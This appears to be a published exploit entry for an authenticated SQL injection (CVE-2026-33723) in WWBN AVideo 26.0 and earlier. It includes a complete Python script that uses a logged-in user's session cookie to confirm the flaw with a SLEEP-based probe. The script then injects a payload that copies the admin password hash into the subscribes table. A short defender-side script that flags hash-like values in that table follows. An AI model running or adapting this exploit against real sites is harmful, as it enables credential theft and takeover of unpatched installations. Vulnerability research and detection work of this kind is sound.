Exploit Title: WWBN AVideo <= 26.0 - Authenticated SQL Injection
CVE: CVE-2026-33723
Date: 2026-03-25
Exploit Author: Mohammed Idrees Banyamer
Author Country: Jordan
Instagram: @banyamer_security
Author GitHub: https://github.com/mbanyamer
Author Blog: https://banyamersecurity.com/blog/
Vendor Homepage: https://github.com/WWBN/AVideo
Software Link: https://github.com/WWBN/AVideo
Affected: AVideo <= 26.0
Tested on: AVideo 26.0
Category: Web Application
Platform: Linux / Windows
Exploit Type: SQL Injection
CVSS: 7.1 HIGH

Description:
Authenticated SQL Injection via the user_id parameter in subscribe.json.php and subscribeNotify.json.php, allowing extraction of admin password hashes and other sensitive database data.

Fixed in: https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c

Notes:
• Requires a valid PHPSESSID from any logged-in user (a regular user is enough)
• Injects data into the subscribes.email column

How to Use

Step 1: Log in to AVideo with any user account and copy the PHPSESSID cookie value.
Step 2: Edit the TARGET and PHPSESSID variables in the exploit script, then run it.

=== Full Python Exploit ===

#!/usr/bin/env python3
# Exploit Title: WWBN AVideo <= 26.0 - Authenticated SQL Injection
# CVE: CVE-2026-33723
# Date: 2026-03-25
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Author Blog: https://banyamersecurity.com/blog/
# Vendor Homepage: https://github.com/WWBN/AVideo
# Software Link: https://github.com/WWBN/AVideo
# Affected: AVideo <= 26.0
# Tested on: AVideo 26.0
# Category: Web Application
# Platform: Linux / Windows
# Exploit Type: SQL Injection
# CVSS: 7.1
# Description: Authenticated SQL Injection via user_id parameter in subscribe.json.php
#              and subscribeNotify.json.php allowing extraction of admin password hashes
#              and sensitive database data.
# Fixed in: https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c
# Usage:
#   python3 exploit.py

import requests
import sys
import time


def banner():
    print(r"""
██████╗  █████╗ ███╗   ██╗██╗   ██╗ █████╗ ███╗   ███╗███████╗██████╗
██╔══██╗██╔══██╗████╗  ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██╗
██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗  ██████╔╝
██╔══██╗██╔══██║██║╚██╗██║  ╚██╔╝  ██╔══██║██║╚██╔╝██║██╔══╝  ██╔══██╗
██████╔╝██║  ██║██║ ╚████║   ██║   ██║  ██║██║ ╚═╝ ██║███████╗██║  ██║
╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝  ╚═╝╚═╝     ╚═╝╚══════╝╚═╝  ╚═╝
                 ╔═╗ Banyamer Security ╔═╗
""")


# Edit these two values before running (see "How to Use" above).
TARGET = "https://target.com"
PHPSESSID = "YOUR_VALID_PHPSESSID_HERE"

HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    "Content-Type": "application/x-www-form-urlencoded",
}
COOKIES = {"PHPSESSID": PHPSESSID}


def send_payload(payload, endpoint="/objects/subscribe.json.php"):
    """POST the payload as the user_id form parameter to the given endpoint."""
    data = {"user_id": payload}
    url = TARGET.rstrip("/") + endpoint
    try:
        r = requests.post(url, data=data, cookies=COOKIES, headers=HEADERS, timeout=15)
        return r
    except Exception as e:
        print(f"[-] Error: {e}")
        return None


def main():
    banner()

    if not PHPSESSID or PHPSESSID == "YOUR_VALID_PHPSESSID_HERE":
        print("[-] Please edit the script and set your valid PHPSESSID!")
        sys.exit(1)

    print(f"[*] Target  : {TARGET}")
    print(f"[*] Session : {PHPSESSID[:15]}...\n")

    # Step 1: time-based confirmation of the injection point.
    print("[+] Testing Time-Based SQL Injection...")
    start = time.time()
    send_payload("99999'+AND+SLEEP(5)+AND+'1")
    elapsed = time.time() - start
    print(f"    Response time: {elapsed:.2f} seconds")

    if elapsed >= 4.5:
        print("    [+] Vulnerable! Time-based SQLi confirmed.")
    else:
        print("    [-] Not vulnerable or blocked.")

    print("\n" + "=" * 70)

    # Step 2: write the admin password hash into subscribes.email.
    print("[+] Extracting Admin Password Hash...")
    extract_payload = "99999',(SELECT pass FROM users WHERE isAdmin=1 LIMIT 1),'a','1.1.1.1',now(),now(),'1'); -- -"
    send_payload(extract_payload)
    print("    [+] Payload sent successfully!")
    print("    [+] Admin password hash has been injected into the 'subscribes' table (email column).")
    print("    [+] Check your subscriptions or database to retrieve the hash.")

    print("\n[+] Exploit finished. Use responsibly!")


if __name__ == "__main__":
    main()
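Because the advisory states that successful exploitation leaves the extracted data in the subscribes.email column, an administrator can audit that column for values that are not e-mail addresses. The following is an added defender-side check, not code from the advisory or from the AVideo project; it assumes only that the table is named subscribes and has an email column (the id and users_id columns and all sample rows are constructed here to make it runnable against an in-memory SQLite database).

```python
import re
import sqlite3

# Constructed sample rows: two normal subscriptions and two rows shaped like
# what an INSERT-style injection leaves behind (a hash where an e-mail belongs).
SAMPLE_ROWS = [
    ("alice@example.com", 7),
    ("bob@example.org", 12),
    ("$2y$10$CONSTRUCTEDHASHVALUEabcdefghijklmnopqrstuvwxyz0123456", 99999),
    ("5f4dcc3b5aa765d89b4aa13e9f3f1a9b0c0d1e2f", 99999),
]

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
# bcrypt ($2a$/$2b$/$2y$), argon2, or a bare 32-64 char hex digest (md5/sha1/sha256).
HASH_RE = re.compile(r"^\$2[aby]\$\d{2}\$|^\$argon2|^[0-9a-f]{32,64}$")


def load_sample_db():
    """Build an in-memory subscribes table from the constructed rows (schema assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE subscribes (id INTEGER PRIMARY KEY, email TEXT, users_id INTEGER)"
    )
    conn.executemany("INSERT INTO subscribes (email, users_id) VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def find_suspicious_subscribes(conn):
    """Return rows whose email value is not an address or looks like a password hash."""
    suspicious = []
    for row_id, email, users_id in conn.execute("SELECT id, email, users_id FROM subscribes"):
        value = email or ""
        reasons = []
        if not EMAIL_RE.match(value):
            reasons.append("not an e-mail address")
        if HASH_RE.match(value):
            reasons.append("looks like a password hash")
        if reasons:
            suspicious.append({"id": row_id, "email": value, "users_id": users_id, "reasons": reasons})
    return suspicious


if __name__ == "__main__":
    for hit in find_suspicious_subscribes(load_sample_db()):
        print(f"row {hit['id']} (users_id={hit['users_id']}): {hit['email']!r} -> {', '.join(hit['reasons'])}")
```

Any hit should be treated as a sign that the injection was used and that the affected admin credential needs rotation, not just that the row needs deleting.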
References:
https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h
https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c